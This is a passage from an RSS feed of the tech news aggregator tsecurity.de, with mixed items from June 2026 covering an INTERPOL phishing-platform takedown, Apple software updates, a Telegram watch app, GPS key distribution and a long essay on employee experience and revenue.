* Jugendbeteiligung: https://studiengruppejugendbeteiligung.wordpress.com/2015/10/17/landtag-von-baden-wuerttemberg-beschliesst-aenderung-des-%c2%a7-41a-der-gemeindeordnung/<br />
* Anti Palantir: https://sbamueller.com/2025/11/06/anhoerung-der-oeffentlichen-petitionen-keine-nutzung-der-software-gotham-von-palantir-in-baden-wuerttemberg-am-do-6-november-2025-1300/<br />
<br />
Sebastian Müller<br />
<br />
https://cfp.cttue.de/tdf5/talk/XUAHVX/<br />
<br />
#tdf2026 #EthicsPoliticsandSociety<br />
<br />
Licensed to the public under https://creativecommons.org/licenses/by/4.0/<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Ladebuchse: Xiaomi will mit Roboterarm E-Autos aufladen]]></title>
<description><![CDATA[Tesla hat es 2015 vorgeführt und dann aufgegeben. Xiaomi zeigt jetzt, wie ein Roboterarm das Elektroauto in der Garage selbstständig ansteckt. (Wallbox, Roboter)]]></description>
<link>https://tsecurity.de/de/3595503/it-nachrichten/ladebuchse-xiaomi-will-mit-roboterarm-e-autos-aufladen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3595503/it-nachrichten/ladebuchse-xiaomi-will-mit-roboterarm-e-autos-aufladen/</guid>
<pubDate>Sat, 13 Jun 2026 13:32:18 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Tesla hat es 2015 vorgeführt und dann aufgegeben. Xiaomi zeigt jetzt, wie ein Roboterarm das Elektroauto in der Garage selbstständig ansteckt. (<a href="https://www.golem.de/specials/wallbox/">Wallbox</a>, <a href="https://www.golem.de/specials/robots/">Roboter</a>) <img src="https://cpx.golem.de/cpx.php?class=17&amp;aid=209743&amp;page=1&amp;ts=1781350202" alt="" width="1" height="1">]]></content:encoded>
</item>
<item>
<title><![CDATA[INTERPOL stoppt Sniper Dz: Phishing-as-a-Service für 45.000 Opfer außer Betrieb]]></title>
<description><![CDATA[ALGERIEN / LONDON (IT BOLTWISE) – INTERPOL hat im Rahmen der Operation Ramz die Phishing-as-a-Service-Plattform Sniper Dz zerschlagen und den zentralen Administrator festnehmen lassen. Die Aktion lief über mehrere Monate zwischen Oktober 2025 und Februar 2026 und umfasste Behörden aus 13 Ländern ...]]></description>
<link>https://tsecurity.de/de/3594796/it-security-nachrichten/interpol-stoppt-sniper-dz-phishing-as-a-service-fuer-45000-opfer-ausser-betrieb/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3594796/it-security-nachrichten/interpol-stoppt-sniper-dz-phishing-as-a-service-fuer-45000-opfer-ausser-betrieb/</guid>
<pubDate>Sat, 13 Jun 2026 02:52:58 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-interpol-sniper-dz-takedown-server-rack.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-interpol-sniper-dz-takedown-server-rack.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-interpol-sniper-dz-takedown-server-rack-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-interpol-sniper-dz-takedown-server-rack-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-interpol-sniper-dz-takedown-server-rack-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-interpol-sniper-dz-takedown-server-rack-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-interpol-sniper-dz-takedown-server-rack-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">ALGERIEN / LONDON (IT BOLTWISE) – INTERPOL hat im Rahmen der Operation Ramz die Phishing-as-a-Service-Plattform Sniper Dz zerschlagen und den zentralen Administrator festnehmen lassen. Die Aktion lief über mehrere Monate zwischen Oktober 2025 und Februar 2026 und umfasste Behörden aus 13 Ländern der MENA-Region. Sniper Dz, das offenbar seit mindestens 2015 aktiv war und sich […]</p>
<div><a href="https://www.it-boltwise.de/interpol-stoppt-sniper-dz-phishing-as-a-service-fuer-45-000-opfer-ausser-betrieb.html">... den vollständigen Artikel <strong>»INTERPOL stoppt Sniper Dz: Phishing-as-a-Service für 45.000 Opfer außer Betrieb«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/interpol-stoppt-sniper-dz-phishing-as-a-service-fuer-45-000-opfer-ausser-betrieb.html">INTERPOL stoppt Sniper Dz: Phishing-as-a-Service für 45.000 Opfer außer Betrieb</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Impressive looking dark point and click adventure Tormentum II gets a demo]]></title>
<description><![CDATA[Tormentum II is a follow-up to the popular dark point and click adventure game from 2015, with an impressive set of artwork inspired by H.R. Giger.Read the full article on GamingOnLinux.]]></description>
<link>https://tsecurity.de/de/3593934/linux-tipps/impressive-looking-dark-point-and-click-adventure-tormentum-ii-gets-a-demo/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3593934/linux-tipps/impressive-looking-dark-point-and-click-adventure-tormentum-ii-gets-a-demo/</guid>
<pubDate>Fri, 12 Jun 2026 17:47:50 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Tormentum II is a follow-up to the popular dark point and click adventure game from 2015, with an impressive set of artwork inspired by H.R. Giger.<p><img src="https://www.gamingonlinux.com/uploads/articles/tagline_images/1798276437id29207gol.jpg" alt></p><p>Read the full article on <a href="https://www.gamingonlinux.com/2026/06/impressive-looking-dark-point-and-click-adventure-tormentum-ii-gets-a-demo/">GamingOnLinux</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[How the SpaceX IPO effect could send the Seattle area’s space industry into a higher orbit]]></title>
<description><![CDATA[A rising tide lifts all spaceships: Starcloud, Gravitics and other Northwest space ventures look forward to taking advantage of what SpaceX and Starship will have to offer.  Read More]]></description>
<link>https://tsecurity.de/de/3590582/it-nachrichten/how-the-spacex-ipo-effect-could-send-the-seattle-areas-space-industry-into-a-higher-orbit/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3590582/it-nachrichten/how-the-spacex-ipo-effect-could-send-the-seattle-areas-space-industry-into-a-higher-orbit/</guid>
<pubDate>Thu, 11 Jun 2026 14:48:14 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img width="1024" height="683" src="https://cdn.geekwire.com/wp-content/uploads/2015/01/IMG_4691-1024x683.jpg" class="webfeedsFeaturedVisual wp-post-image" alt="SpaceX and Space Needle" decoding="async" fetchpriority="high" srcset="https://cdn.geekwire.com/wp-content/uploads/2015/01/IMG_4691-1024x683.jpg 1024w, https://cdn.geekwire.com/wp-content/uploads/2015/01/IMG_4691-620x413.jpg 620w, https://cdn.geekwire.com/wp-content/uploads/2015/01/IMG_4691.jpg 1296w" sizes="(max-width: 1024px) 100vw, 1024px"><br>A rising tide lifts all spaceships: Starcloud, Gravitics and other Northwest space ventures look forward to taking advantage of what SpaceX and Starship will have to offer.  <a href="https://www.geekwire.com/2026/spacex-ipo-seattle-space-industry/">Read More</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Telegram Brings Back a Fully Native App for Apple Watch Users]]></title>
<description><![CDATA[Over a decade after first releasing watchOS support, Telegram is finally back on your wrist. CEO Pavel Durov recently announced on X that the platform has officially launched a native app for Apple devices. This means you no longer have to rely on unofficial software just to check your chats whil...]]></description>
<link>https://tsecurity.de/de/3590558/ios-mac-os/telegram-brings-back-a-fully-native-app-for-apple-watch-users/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3590558/ios-mac-os/telegram-brings-back-a-fully-native-app-for-apple-watch-users/</guid>
<pubDate>Thu, 11 Jun 2026 14:40:13 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Over a decade after first releasing watchOS support, Telegram is finally back on your wrist. CEO Pavel Durov recently announced on X that the platform has officially launched a native app for Apple devices. This means you no longer have to rely on unofficial software just to check your chats while away from your phone. It brings all the basic chat features straight to your smartwatch.



Scan a QR code to unlock chat and media features



To get started, you just open the software on your Apple Watch and scan a QR code using your iPhone. The setup process works exactly like logging in on a web browser or a desktop computer. If you have an extra cloud password set up for security, you will need to enter that to finish logging in.




https://twitter.com/durov/status/2064434685023854663




Once connected, you get a highly complete experience for a wearable device. You can view your contact list and jump right into existing conversations. The app lets you send and receive text messages, listen to voice notes, and share your current location.



You are also not limited to just plain text. The new interface allows you to view stickers, play animated GIFs, and even watch videos right from your wrist. It is a big step up from basic notifications that just ping you when someone says hello.



The official app returns after being discontinued years ago



Telegram actually introduced a watch application way back in 2015. However, it eventually discontinued that version and completely removed watchOS support a few years later. During that gap, people had to seek out other messaging apps or rely entirely on third-party clients to fill the void.



Now, the company has reversed that decision. Interestingly, the official App Store release notes do not even mention this major update. Despite the missing text, the new version is actively rolling out right now to users everywhere the service is available.



If you like leaving your phone in your pocket, this update brings exactly what you need to stay connected. You can head to the App Store today, grab the latest download, and manage your conversations right from your wrist.]]></content:encoded>
</item>
<item>
<title><![CDATA[Why employee experience is now a revenue driver]]></title>
<description><![CDATA[As quoted by Doug Conant, “To win in the marketplace, you must first win in the workplace.”



For many years, I treated this quote as motivational wall art, a nice sentiment, but not exactly a business strategy. Employee engagement for me was always an HR checkbox, which is important but ultimat...]]></description>
<link>https://tsecurity.de/de/3589928/it-security-nachrichten/why-employee-experience-is-now-a-revenue-driver/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3589928/it-security-nachrichten/why-employee-experience-is-now-a-revenue-driver/</guid>
<pubDate>Thu, 11 Jun 2026 11:05:29 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>As quoted by <a href="https://conantleadership.com/wp-content/uploads/2015/12/speaker_sheet_final1-2.pdf" rel="nofollow">Doug Conant</a>, “To win in the marketplace, you must first win in the workplace.”</p>



<p>For many years, I treated this quote as motivational wall art, a nice sentiment, but not exactly a business strategy. Employee engagement for me was always an HR checkbox, which is important but ultimately unimportant to revenue and growth.</p>



<p>Old me always felt that EX (employee experience) was a “nice to have,” not something that could move the financial needle.</p>



<p>But now this perspective has fundamentally changed. </p>



<p>With years of experience, I now understand that motivated and empowered employees don’t just perform better, they directly impact the bottom line, i.e., your overall revenue.</p>



<p>I have seen that engaged employees innovate faster. They are experienced enough to resolve customer issues in half the time and create the kind of brand loyalty that turns customers into advocates.</p>



<p>Organizations that invest strategically in employee experience are seeing measurable returns: <a href="https://www.gallup.com/q12-employee-engagement-survey/" rel="nofollow">Gallup’s research shows </a>that highly engaged teams achieve 23% greater profitability.</p>



<p>Based on this experience, I thought I must pen down my learning with my fellow leaders on how this realization reshaped my perspective.</p>



<p>What once seemed secondary is now a core business driver, changing how priorities are set, how teams are led and how performance is measured.</p>



<h2 class="wp-block-heading">The turning point</h2>



<p>The shift wasn’t gradual. As a matter of fact, it was fast and has changed everything.</p>



<p>We’ve been consistently hitting our numbers.</p>



<p>Revenue targets? Met.</p>



<p>Quarterly projections? On track.</p>



<p>But still something felt fundamentally off.</p>



<p>The warning signs were everywhere, hiding in plain sight. But it was I who was unaware of them.</p>



<p>Let’s go through some of them:</p>



<ul class="wp-block-list">
<li>High-performing employees were leaving without clear reasons (three senior engineers in four months, two mobile app developers in a quarter).</li>



<li>Teams that once moved with vision, speed and ownership have started showing signs of fatigue.</li>



<li>Communication across teams started to weaken, leading to misalignment.</li>
</ul>



<p>On paper, everything looked healthy and stable, but…When we ran the numbers, the financial reality became impossible to ignore.</p>



<p>Replacing each departing senior employee costs us between 70%, including recruitment fees, onboarding, lost productivity during the ramp period and the knowledge gap left behind.</p>



<p>Can you imagine we had spent a significant portion of our overall hiring budget in just 9 months backfilling roles?</p>



<p>On the other hand, the hidden costs were even more alarming:</p>



<ul class="wp-block-list">
<li><strong>Lost revenue from disrupted client relationships</strong>: When our customer success lead left mid-cycle, we experienced gaps in follow-ups, overscheduling of client calls and changing points of contact, resulting in the account not being renewed.</li>



<li><strong>Delayed product launches</strong>: Our new product version release was delayed by 2 quarters. The reason behind this was that the original technical lead left and the replacement needed 5 months just to understand the workflows.</li>



<li><strong>Declining win rates</strong>: A lack of team alignment, untimely responses and frequent task rescheduling disrupted workflows, making it harder for teams to deliver the new product version on time.</li>
</ul>



<p>Finding all these hidden costs, I was staring at an invisible tax on every business outcome.</p>



<p>We analyzed that if this continued for another year, we would be looking at a 42%  decline in our expected revenue. This cost is equivalent to losing nearly half of our annual growth target, not from market forces or competitive pressure, but from internal attrition.</p>



<h2 class="wp-block-heading">The hidden mechanics: 4 pathways from employee experience to revenue</h2>



<p>After finding the challenges, I focused on understanding its structure, not just that employee experience mattered, but also how EX impacted each part of the business.</p>



<p>What I discovered wasn’t a simple cause-and-effect relationship. It was an interconnected system in which employee experience served as the underlying operating system for every revenue-generating function.</p>



<p>In my discovery, I found four distinct pathways, each either accelerating growth or quietly reducing it. </p>



<h3 class="wp-block-heading">Pathway 1: Retention = institutional knowledge = execution velocity</h3>



<p>When an employee leaves, they are not just walking out the door but taking their skills and your company’s accumulated intelligence.</p>



<p>I can relate to this fact, when our lead developer left, she didn’t just take her coding ability. She took:</p>



<ul class="wp-block-list">
<li>The unwritten knowledge of why certain architectural decisions were made a few months ago</li>



<li>Relationships with the internal team who trusted her skills </li>



<li>The shortcuts and workarounds that made our deployment process 40% faster</li>



<li>The ability to look at a bug and immediately spot the integration issues that our documentation never covered</li>
</ul>



<p>The revenue impact was surgical and devastating: New hires require 3-4 months to reach full productivity in any complex or executive roles, which means everything moves more slowly during that entire ramp period.</p>



<p>Deal cycles that took 60 days stretched to 90. Strategic decisions made in real time now needed additional review layers because the new person didn’t have the context to move with confidence.</p>



<p>We measured the delta: Employees with over two years of experience delivered 34% better customer retention and 28% more contracts than newer joinees. But the gap wasn’t just about skill, it was about trust velocity.</p>



<p>Experienced employees operated with well-established client trust and there was flawless cross-functional collaboration between them.</p>



<p>But now, with new employees, this had to be recreated from scratch.</p>



<p><strong>What fundamentally changed my thinking:</strong> I had always budgeted for direct replacement costs, 14% for recruiting, the 15% for onboarding and training. What I never budgeted for was the invisible tax of having B-level productivity in A-level seats for 3-4 months while new hires ramped.</p>



<p>The main gap between what an experienced, old employee produces and what a new joiner (with 10% of product knowledge) produces was costing us 15–20% of potential output across affected teams.</p>



<p>Retention wasn’t an HR metric. It was a margin protection strategy.</p>



<h3 class="wp-block-heading">Pathway 2: Engagement = innovation = competitive differentiation</h3>



<p>The truth I took too long to accept is that “disengaged employees still do their jobs, but engaged employees improve their jobs.”</p>



<p>This difference is everywhere, especially in renovation, where small, regular improvements add up to a big competitive edge.</p>



<p>The innovation gap emerged in our product roadmap: I asked our development team to trace the origins of our new versions over the past two years.</p>



<p>The results were unexpected: 73% ideas originated from developers who felt psychologically safe enough to propose ideas outside their sprint commitments.</p>



<p>In a nutshell, most creative ideas didn’t come from structured sessions. They mainly came from casual internal chat where people felt confident that their ideas would be heard.</p>



<p>The remaining 27% came from leadership demands, customer problems, driven by urgency. </p>



<p>The customer-facing gap was the most painful: The support team had been highly proactive, often resolving issues before they arose. During the disengagement period, that proactive momentum dropped significantly, leading to growing misalignment among team members.</p>



<p><strong>What fundamentally changed my thinking:</strong> Old me believed that a strong resume drove creation, but my experience taught me otherwise. My best hire was a self-taught developer who transformed our CI/CD pipelines not just through skills, but because she could experiment freely without waiting for approval. </p>



<h3 class="wp-block-heading">Pathway 3: Disengagement = lost upsell opportunity = revenue left on the table</h3>



<p>In my experience, this pathway has been one of the trickiest and, frankly, the one that took the longest to identify.</p>



<p>Disengaged employees don’t just underperform; they stop seeing opportunities altogether.</p>



<p>I’ll share one experience that I only fully understood later. One of our disengaged employees was running a renewal drip email campaign for a key customer. On the surface, everything looked fine: emails were going out on time, reminders were sent and the process was being followed. But the employee in question never went beyond the script and never asked about the client’s growth plans, changing needs, or future direction.</p>



<p>The breaking point came during a customer email when we lost one of our major customers, not through churn, but through a missed opportunity. They moved to a competitor offering a more comprehensive solution.</p>



<p>The real issue surfaced during the account exit discussion. One of their C-level leaders wrote something that made the gap painfully clear. He said:</p>



<p>“We would have upgraded to your ultimate control plan months ago if someone had consistently followed up or even asked about our growth plans. We assumed you weren’t interested in expanding with us because every interaction felt limited to renewal emails.”</p>



<p>We left significant revenue on the table, not due to product limitations. Because of our overwhelmed and disengaged team, which simply missed discussing or asking follow-up questions over emails and didn’t ask the right questions to surface the opportunity.</p>



<p>After this, we decided to track “missed expansion opportunities,” and the numbers were brutal:</p>



<ul class="wp-block-list">
<li>Customer success teams reported that a substantial portion of churned customers had expressed needs during support calls that our premium features could have addressed, but nobody connected those dots or escalated them as expansion opportunities</li>



<li>In account reviews, we found multiple instances where customers were building workarounds or buying complementary tools from other vendors to solve problems our existing product could handle, but we just never offered them.</li>
</ul>



<p><strong>What fundamentally changed my thinking:</strong> I had always viewed the customer success team as a retention function that helps organizations keep customers happy, renew contracts and avoid customer churn. That separation was strategically flawed.</p>



<p>Retention without expansion is defensive. Expansion is how you turn customers into compounding revenue streams.</p>



<p>But expansion requires two things disengagement destroys:</p>



<ol start="1" class="wp-block-list">
<li><strong>Deep product and customer knowledge</strong> (which walks out the door when experienced people leave)</li>



<li><strong>Proactive energy and investment</strong> (which evaporates when people are overwhelmed and checked out)</li>
</ol>



<p>The new joiners can reach this point yet, as they are new to the product and still need a lot of knowledge to acknowledge clients’ needs.</p>



<p>As a result, expansion opportunities slowed and revenue from existing accounts remained untapped.</p>



<h3 class="wp-block-heading">Pathway 4: Attrition = talent scarcity = higher acquisition costs</h3>



<p>When experienced employees leave, you don’t just lose their output; you reset the talent bar for every future hire.</p>



<p>When we lost senior engineers and account managers, we didn’t just need “replacements,” we needed people with specific technical expertise. People who deeply understand how product companies operate and have the ability to hit the ground running in complex environments.</p>



<p>The talent acquisition challenge compounded quickly: Our recruiters had to dig much deeper to find candidates who met our requirements. We needed engineers proficient in specific technology, familiar with our industry’s norms and experienced enough to navigate difficult problems without constant hand-holding.</p>



<p>The challenge: those candidates are rare, expensive and have multiple offers.</p>



<p>The margin erosion was measurable:</p>



<ul class="wp-block-list">
<li>Cost-per-hire increased dramatically as we competed for scarce specialized talent</li>



<li>Time-to-fill stretched as we rejected underqualified candidates, leaving revenue-generating roles empty longer</li>



<li>Recruiting resources shifted from growth hiring to backfilling attrition</li>
</ul>



<p>The compounding effect: Poor retention → higher talent requirements → longer searches → more expensive offers → pressure to lower standards → weaker hires → worse outcomes → more attrition → repeat.</p>



<p><strong>What fundamentally changed my thinking: </strong>Retention isn’t an HR metric. It’s a talent acquisition cost-avoidance strategy. Every senior employee who stays is one fewer impossible-to-fill role your recruiters have to source in a competitive market.</p>



<h2 class="wp-block-heading">The multiplier effect: Why small drops create cascading failures</h2>



<p>What blindsided me was that these four pathways don’t operate independently. In fact, they amplify and accelerate each other.</p>



<p>When one senior engineer left, the damage didn’t stop:</p>



<ul class="wp-block-list">
<li><strong>The replacement took 4 months to reach full productivity</strong> (Pathway 1: Retention = institutional knowledge = execution velocity)</li>



<li><strong>During that 3-4 month gap, the team experienced a 17% </strong>slowdown in development because we lost institutional knowledge and had to onboard a new person (Pathway 2: Innovation).</li>



<li><strong>Two customers cited concerns about account management</strong> in exit surveys because the new account manager couldn’t identify upsell opportunities the way the experienced manager had (Pathway 3: Disengagement = lost upsell opportunity)</li>



<li><strong>Three other team members saw the lack of backfill support, felt the increased workload and started interviewing elsewhere</strong>—making the already-difficult talent search even harder (Pathway 4: Attrition = talent scarcity = higher acquisition costs)</li>
</ul>



<p>One departure accounted for 70% of the measurable cascading impact across all four pathways.</p>



<p>But here’s the insight that changed everything: Employee experience isn’t linear; it’s exponential.</p>



<ul class="wp-block-list">
<li>One toxic manager can infect three teams in a single quarter</li>



<li>One great manager can elevate an entire division in six months</li>



<li>One highly visible departure can trigger a race if people interpret it as “the best people are leaving.”</li>



<li>One highly visible retention (turning down a competitor’s offer) can stabilize a nervous team</li>
</ul>



<p>Employee Experience isn’t overhead. It’s a revenue multiplier with a 4-5 month lag, and most leaders never measure it until the damage is irreversible.</p>



<h2 class="wp-block-heading">The results: What changed</h2>



<p>Four months after we committed to treating employee experience as a revenue strategy, the data told a story that even the most skeptical members of our leadership team couldn’t dismiss.</p>



<p>But the journey wasn’t a smooth upward curve; it was messy, nonlinear and full of surprises.</p>



<h3 class="wp-block-heading">The quantified outcomes: What the metrics actually showed</h3>



<p>Here’s what changed across our core employee experience and business metrics:</p>



<p>Employee-side metrics:</p>



<ul class="wp-block-list">
<li>Voluntary turnover dropped from 18% to 9%, cutting our attrition rate in half</li>



<li>Internal mobility doubled from 22% to 41%, meaning we were filling nearly half of open roles with internal candidates who already understood our culture and systems</li>



<li>Time-to-productivity for new hires decreased from 5 months to 3 months, and people were ramping 32% faster because they had better onboarding and more engaged teams supporting them</li>
</ul>



<p>Business-side metrics (the ones that actually matter to the board):</p>



<ul class="wp-block-list">
<li>Enterprise sales close rate recovered from 26% back to 33% (nearly returning to our pre-crisis levels).</li>



<li>Average contract value increased by 19% (engaged customer success leads were upselling and expanding accounts instead of just managing renewals).</li>



<li>Customer churn dropped from 8.2% to 5.1% (a direct result of more consistent, invested customer service).</li>
</ul>



<p>Financial impact: The combined effect of reduced attrition, faster ramp times, improved sales performance and lower customer churn translated into an approximately 42% increase in the annual revenue run rate over 6 months.</p>



<h2 class="wp-block-heading"><a></a>What I wish I’d known going in</h2>



<p>If I could go back to the beginning of this transformation, here’s what I’d tell myself:</p>



<ul class="wp-block-list">
<li><strong>The first two months will test your commitment.</strong> Metrics will get worse as you expose hidden problems. Don’t panic. Don’t retreat. Trust the process.</li>



<li><strong>You’ll lose some people, and that’s okay.</strong> Some managers won’t adapt. Some employees thrived in the old dysfunction. Letting them go is part of the healing.</li>



<li><strong>The ROI is real, but it’s not immediate.</strong> Build a coalition of believers on your leadership team and board who understand that this is a 4-5-month investment, not a quick fix.</li>



<li><strong>Employees are watching for consistency, not perfection.</strong> You’ll make mistakes. What matters is whether you acknowledge them, adjust and keep moving forward.</li>



<li><strong>The moment you treat employee experience as optional, it becomes worthless.</strong> This only works if it’s a non-negotiable strategic priority, measured and managed like revenue.</li>
</ul>



<h2 class="wp-block-heading">Conclusion: Employee experience as infrastructure, not initiative</h2>



<p>Doug Conant was right: to win in the marketplace, you must first win in the workplace. But I’d added a critical line to this: “your employees are your first customers and they’re either selling for you or quietly selling against you.”</p>



<p>Eighteen months into this transformation, employee experience moved from an HR metric to a core business driver in my organization. Leadership conversations, performance metrics and strategic decisions now reflect its impact. In a talent-driven environment, this shift created an advantage that competitors cannot easily replicate because culture requires sustained commitment, not just investment.</p>



<p>Neglect carries a real cost. Disengagement, attrition and broken trust compound quietly before showing up in revenue, customer relationships and execution speed.</p>



<p>A clear conclusion emerged from this journey. Investing in employee experience strengthens the business’s foundation, while ignoring it guarantees a far more expensive rebuild later.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>



<p></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Fewer iPhone users are updating to iOS 26 than they did with iOS 18]]></title>
<description><![CDATA[The iOS 26 update has the second-worst adoption rate of all iOS releases since 2015, falling behind both iOS 18 and iOS 8.iOS 18 (left) adoption rates were better than those of iOS 26 (right).Though all eyes might be on iOS 27 and its AI-infused Siri, which debuted at WWDC, the software has only ...]]></description>
<link>https://tsecurity.de/de/3589132/ios-mac-os/fewer-iphone-users-are-updating-to-ios-26-than-they-did-with-ios-18/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3589132/ios-mac-os/fewer-iphone-users-are-updating-to-ios-26-than-they-did-with-ios-18/</guid>
<pubDate>Thu, 11 Jun 2026 00:54:40 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The <a href="https://appleinsider.com/inside/ios-26" title="iOS 26" data-kpt="1">iOS 26</a> update has the second-worst adoption rate of all iOS releases since 2015, falling behind both iOS 18 and iOS 8.<br><br><div><img src="https://photos5.appleinsider.com/gallery/67919-143168-63921-133058-cropped-18vs19-xl-(1)-xl.jpg" alt="Two modern smartphones side by side, each showing colorful home screens with app icons, widgets, and large digital clocks, set against a gradient teal-to-blue background" height="738"><br><span>iOS 18 (left) adoption rates were better than those of iOS 26 (right).</span></div><br>Though all eyes might be on <a href="https://appleinsider.com/inside/ios-27" title="iOS 27" data-kpt="1">iOS 27</a> and its AI-infused <a href="https://appleinsider.com/inside/siri" title="Siri" data-kpt="1">Siri</a>, which debuted at <a href="https://appleinsider.com/inside/wwdc" title="WWDC" data-kpt="1">WWDC</a>, the software has only entered beta testing.<br><br>Most iPhones, or 79% of all devices to be more precise, are currently running iOS 26. This is according to Apple's <a href="https://appleinsider.com/inside/app-store" title="App Store" data-kpt="1">App Store</a> data for <a href="https://developer.apple.com/support/app-store/">June 2026</a>, which also revealed that 86% of all devices introduced in the last four years have iOS 26 installed.<br><br><br> <a href="https://appleinsider.com/articles/26/06/10/fewer-iphone-users-are-updating-to-ios-26-than-they-did-with-ios-18?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/244623?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[For the first time in four years, tvOS cuts off some older Apple TV hardware]]></title>
<description><![CDATA[Apple's new tvOS 27 delivers Apple's first major Apple TV hardware cutoff in years, ending support for streaming boxes introduced in 2015 and 2017.Apple TV 4KThe compatibility change appeared in Apple's tvOS 27 documentation following WWDC 2026 on June 8. Apple TV HD, introduced in 2015, and the ...]]></description>
<link>https://tsecurity.de/de/3585824/ios-mac-os/for-the-first-time-in-four-years-tvos-cuts-off-some-older-apple-tv-hardware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3585824/ios-mac-os/for-the-first-time-in-four-years-tvos-cuts-off-some-older-apple-tv-hardware/</guid>
<pubDate>Tue, 09 Jun 2026 21:11:22 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple's new tvOS 27 delivers Apple's first major Apple TV hardware cutoff in years, ending support for streaming boxes introduced in 2015 and 2017.<br><br><div><img src="https://photos5.appleinsider.com/gallery/67902-143130-Apple-TV-4K-top-xl.jpg" alt="Apple TV box with a black Apple logo on top, placed beside a slim silver remote featuring a circular touchpad and several black buttons on a blue background" height="738"><span>Apple TV 4K</span></div><br>The compatibility change appeared in Apple's tvOS 27 documentation following <a href="https://appleinsider.com/inside/wwdc" title="WWDC" data-kpt="1">WWDC</a> 2026 on June 8. Apple TV HD, introduced in 2015, and the first-generation <a href="https://appleinsider.com/inside/apple-tv-4k" title="Apple TV 4K" data-kpt="1">Apple TV 4K</a>, introduced in 2017, are no longer eligible for the update.<br><br>Compatibility is limited to the second-generation Apple TV 4K released in 2021 and third-generation Apple TV 4K models released in 2022.<br><br>Apple TV HD remained eligible for major tvOS updates for nearly a decade before losing support with tvOS 27. The first-generation Apple TV 4K received major operating system updates for about eight years before reaching the end of the compatibility list.<br><br><br> <a href="https://appleinsider.com/articles/26/06/09/for-the-first-time-in-four-years-tvos-cuts-off-some-older-apple-tv-hardware?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/244604?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[GPS As a Key Distribution Platform]]></title>
<description><![CDATA[This is interesting:
The U.S. military has likely been quietly broadcasting codes for its global encryption network using public GPS for nearly 20 years, turning each satellite into a hidden “numbers station,” according to Steven Murdoch…
That means every device that uses GPS has been receiving h...]]></description>
<link>https://tsecurity.de/de/3584925/reverse-engineering/gps-as-a-key-distribution-platform/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3584925/reverse-engineering/gps-as-a-key-distribution-platform/</guid>
<pubDate>Tue, 09 Jun 2026 17:09:37 +0200</pubDate>
<category>🕵️ Reverse Engineering</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://www.404media.co/the-u-s-military-quietly-turned-gps-into-a-global-numbers-station-evidence-suggests/">This</a> is interesting:</p>
<blockquote><p>The U.S. military has likely been quietly broadcasting codes for its global encryption network using public GPS for nearly 20 years, turning each satellite into a hidden “numbers station,” according to Steven Murdoch…</p>
<p>That means every device that uses GPS has been receiving hidden government information for years, and nobody outside the military knew it until now.</p>
<p>[…]</p>
<p>Murdoch discovered that this particular sentinel was transmitted by all 31 operational satellites within a window of a few hours on May 26, 2011, potentially heralding the activation of a new operational system. He confirmed that this timeline coincided with the rollout of the military’s Over-the-Air Distribution (OTAD) and the Over-the-Air Rekeying (OTAR) by cross-referencing declassified documents, including a 2015 presentation about the dates of the operation...</p></blockquote>]]></content:encoded>
</item>
<item>
<title><![CDATA[tvOS 27: Apple streicht Unterstützung für zwei Apple-TV-Modelle]]></title>
